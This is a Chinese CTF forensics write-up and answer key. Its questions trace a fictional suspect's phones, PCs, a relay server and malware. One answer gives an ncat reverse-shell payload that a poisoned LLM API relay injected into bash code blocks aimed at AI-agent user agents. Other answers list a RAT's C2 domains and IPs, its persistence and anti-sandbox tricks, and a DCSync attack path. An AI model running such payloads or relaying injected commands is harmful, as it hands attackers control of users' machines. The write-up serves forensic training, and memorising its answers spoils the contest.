2026平航杯writeup

R4f34s1XoPz34wrV

早起王的传奇还在继续
题目质量很高，做的很爽
部分逆向题目使用了ai辅助

早起王手机

1 分析早起王的手机，手机型号为？【答案格式：Xiaomi13】

Pixel6

2 分析早起王的手机，早起王最近想旅行，结合高德地图搜索记录，他最可能去的景点是哪个？【答案格式：黄山】

西湖

看火眼的位置分析就能看到

3 分析早起王的手机，早起王在什么时间加上倩倩微信的？【答案格式：2025-08-18 07:09:19】

2026-03-30 15:13:08

4 分析早起王的手机，倩倩在2026年3月30号吃了什么？【答案格式：西湖醋鱼】

麻薯小蛋糕

倩倩手机

5 分析倩倩的手机，倩倩手机的系统版本是多少？【答案格式：5.2.3.123】

6.0.0.130

6 分析倩倩的手机，“舔狗”的微信内部ID是多少？【答案格式：wxid_ab12】

wxid_uh5tfx2zi8yh22

7 分析倩倩的手机，倩倩曾给一位好友推荐游戏，这个好友叫什么名字？【答案格式：杨梅】

冰糖

8 分析倩倩的手机结合逆向包，推荐的游戏叫什么？【答案格式：far echo】

zero sievert

9 分析倩倩的手机，倩倩一共阅读过多少条搜狐新闻？【答案格式：11】

10 分析倩倩手机逆向包，数据加密app的包名是什么？【答案格式：com.komeiji.satori】

com.koishi.fpt

11 接上题，初始化app时需要至少几位数的密码？【答案格式：10】

12 接上题，加密后的文件名的后缀是什么？【答案格式：.enc】

.tb

13 接上题，app会自动识别几种后缀的文件为图片类型？【答案格式：8】

14 接上题，app共从用于自定义加密的so模块导入了几个方法？【答案格式：8】

15 接上题，app设置的密码是多少？【答案格式：514aa11a4191a98】

217cb94a01679e39

16 接上题，app中存储的门锁密码是多少？【答案格式：5141141919810】

1472580369123

17 接上题，加密图片里面的隐藏的flag是多少？【答案格式：flag{123456!}】

flag{happy_forensics_2026!}

中转服务器

18 分析服务器镜像，内核版本为？【答案格式：5.10-301-generic】

6.8.0-107-generic

19 分析服务器镜像，用户登录成功系统的次数为？【答案格式：3】

20 分析服务器镜像，redis数据库服务密码是多少? 【答案格式：abcdef】

zjjcxy

21 分析服务器镜像，api站点后台管理员密码所用的加密算法为？【答案格式：bcrypt】

argon2

22 分析服务器镜像，api站点后台管理员密码为（使用rockyou字典爆破，密码格式b1?????b，?为数字）？【答案格式：a123456a】

b123321b

23 分析服务器镜像，登录api网站后台，后台通知设置里的超时事件（毫秒）为？【答案格式：10000】

114514

24 分析服务器镜像，登录api网站后台，查询总Token消耗数量为？【答案格式：999.9K】

474.2k

25 分析服务器镜像，登录api网站后台，查询最早创建apikey的时间为？【答案格式：2026-01-01T13:11:22.190Z】

2026-04-01T11:11:07.535Z

26 分析服务器镜像，编写脚本，通过调用inject_bash_blocks函数，确定恶意投毒的payload。（提示：输入一段包含 ```bash ```块的文本）

【答案格式：a.exe 192.168.1.1 22 -i hello】

ncat.exe 156.238.239.253 1314 -e powershell

27 接上题，should_inject_for_ua(ua, ip）对UA字符串有过滤条件，只有特定UA才会进入后续判断。请编写脚本找出有几个UA头能使函数有机会返回true的UA关键词。【答案格式：1】【提示：备选项：curl、openclaw、mozilla、wget、httpx、claude、requests、bot、crawler】

28 接上题，只有当同一IP的上次请求距今足够近时，才会进入概率判断。请编写脚本确定这个时间窗口的阈值（单位：ms）。【答案格式：100，注意，只保留整百的，四舍五入】【提示：必须控制变量，每次实验使用一批全新的IP，先统一记录时间戳，再等待固定间隔后统一检测，不可在等待期间更新同一IP的时间戳，否则会刷新计时，从0ms到1000ms逐步探测，找到从“命中”变为“不命中”的临界间隔，建议每个间隔值使用≥200个IP以消除概率干扰。】

500

29 接上题，在UA条件和IP时间条件均满足的前提下，函数仍有一定概率返回false。请编写脚本估算触发概率，并推算概率1/N（即理论上平均每N次满足前两个条件的调用才触发一次】。【答案格式：10，格式只保留整十】【提示：建议样本量不少于10000次有效检测（UA条件满足+IP时间条件满足），不然四舍五入会出现进位问题。】

早起王电脑

30 请分析早起王的PC镜像，计算机系统 Build 版本是什么？【答案格式：12345.1234】【提示：仿真蓝屏是因存在 OSDATA 文件，删除后即可正常仿真】

19045.6466

31 请分析早起王的PC镜像，用户深情专一沼气王，她是我的生死劫的登陆密码 LM 哈希值后六位？【答案格式：abc123】

1404ee

32 请分析早起王的PC镜像，沼气王的桌面有本日记，请问沼气王暗恋对象的生日为？【答案格式：05月26日】

03月24日

33 请分析早起王的PC镜像，早起王受到过一封邮件，请找出邮件中隐写的秘密【答案格式：xxx，xxx】

12点，老地方

34 请分析早起王的PC镜像，VeraCrypt容器的外层密码是什么？【答案格式：abc123】【提示：分析utools】

qq520250520250520250

35 请分析早起王的PC镜像，早起王设置了一个AI女友，并自行导入过一个角色模型，该模型的原始文件名为？【答案格式：ABC.vrm】

MANUKA.vrm

36 请分析早起王的PC镜像，AI女友使用的模型是什么？【答案格式：openai/GPT5.3-Codex-01-01】

qwen/qwen3.5-flash-02-23

~~这里做题的时候看日志里面还写了qwen2.5-coding但是不对~~

37 请分析早起王的PC镜像，该PC中有一个离线大模型软件，其上次对话使用的模型是？【答案格式：ministral-3-14b-reasoning】

qwen2.5-coder-14b-instruct

38 请分析早起王的PC镜像，早起王曾删除一个MD5值为49B367AC261A722A7C2BBBC328C32545的恶意文件，请尝试数据恢复并找到其文件名？【答案格式：abc123】

49b367ac261a722a7c2bbbc328c32545

39 接上题，该文件中有多个流（streams）包含宏。请提供其中编号最小的一个。【答案格式：3】

40 接上题，混淆代码的解密密钥是什么？【答案格式：填写传入脚本的实际密钥，不包含命令行分隔空格】

EzZETcSXyKAdF_e5I2i1

41 接上题，释放并删除的文件是什么？【答案格式：abc.py】

maintools.js

42 接上题，该文件用的是什么语言？【答案格式：JavaScript】

JavaScript

43 接上题，分配给命令行参数的变量叫什么名字？【答案格式：abc3】

wvy1

44 接上题，哪个函数返回下一阶段代码（即第一轮混淆代码）？【答案格式：abc3】

y3zb

45 接上题，可以使用哪个 Windows 脚本主机程序在命令行模式下执行该脚本？【答案格式：wscript.exe】

cscript.exe

46 接上题，请提取出所有硬编码的C2(Command & Control）服务器域名？【答案格式：www.baidu.com、www.google.com，按照在代码中出现的顺序排序】

www.saipadiesel124.com、www.folk-cantabria.com

47 接上题，当C2服务器返回 "work" 指令时，脚本下载并执行的最终文件扩展名是什么？【答案格式：exe】

pif

48 接上题，如果与C2通信失败，脚本会调用哪个函数尝试自毁并清理痕迹？【答案格式：Aabc】

tbMu

49 请分析早起王的PC镜像，该PC中neo4j数据库的密码是多少？【答案格式：abc3】

1qazxsw2

52 早起王在PC中记录过自己的犯罪动机并对其进行加密，请使用社工的方式破解加密文件，并提交密码。【答案格式：aabc3**】

Zqw20040101!

53 早起王曾给倩倩发送过一封钓鱼邮件，请找到并计算附件MD5值【答案格式：字母不区分大小写】

5436b61ea58adb794804e3f18ce53f2a

54 接上题，编译木马使用的.NET版本是多少？【答案格式：1.1.45141】

4.0.30319

55 接上题，木马中有多少反沙箱和反调试的检测逻辑？【答案格式：8】

56 接上题，木马为获得提升的权限执行而创建的计划任务名称是什么？【答案格式：Netlogon】

WmiPrvSE

57 接上题，木马使用哪种加密算法来加密或混淆其配置数据？【答案格式：BASE64】

AES

58 接上题，为了获取其加密算法的某个参数，木马使用一个硬编码字符串作为输入。这个硬编码字符串的值是多少？【答案格式：uwbf4=wNfw】

8xTJ0EKPuiQsJVaT

59 接上题，木马回连的ip地址有哪些？【按照木马中原始的顺序写入，答案用,隔开，格式：114.114.114.114,8.8.8.8,1.1.1.1】

156.238.239.253,66.175.239.149,185.117.249.43

60 接上题，木马回连的C2通信端口是多少？【答案格式：11451】

7000

61 接上题，该木马通过将自身复制到可移动设备上来传播。在每个受感染设备上创建的新副本的名称是什么？【答案格式：dwm.exe】

USB.exe

62 接上题，木马用来检测其是否在沙盒环境中运行的DLL的名称是什么？【答案格式：v50.dll】

SbieDll.dll

63 接上题，木马操纵的用于控制Windows资源管理器中隐藏项目可见性的注册表项名称是什么？【答案格式：AAAabc3】

ShowSuperHidden

64 接上题，木马使用哪个API将其进程标记为关键进程？【答案格式：WNetAddConnection】

RtlSetProcessIsCritical

65 接上题，木马使用哪个API来捕获用户输入？【答案格式：WNetAddConnection】

SetWindowsHookEx

早起王U盘

50 根据早起王笔录内容，早起王曾经对某企业进行过渗透攻击，请分析域内实体关系，FILESERVER.XIAORANG.LAB 对 XIAORANG.LAB 域拥有什么控制权限？【答案格式：ABCabc】

DCSync

51 根据早起王笔录内容，早起王在渗透过程中已成功控制ZHANGXIN@XIAORANG.LAB，请结合域内实体关系图分析，早起王获取域控权限的完整攻击轨迹是什么？【答案格式：XXXXXXXX@XXXXXXX.XXX->XXXXXXXXXX.XXXXXXX.XXX->XXXXXXXX.XXX】

ZHANGXIN@XIAORANG.LAB->FILESERVER.XIAORANG.LAB->XIAORANG.LAB

倩倩电脑

66 请分析倩倩的PC镜像，倩倩的电脑曾被api投毒过，请找出投毒后执行的的恶意命令。【答案格式：cmd.exe 172.0.0.1 22 -i hello】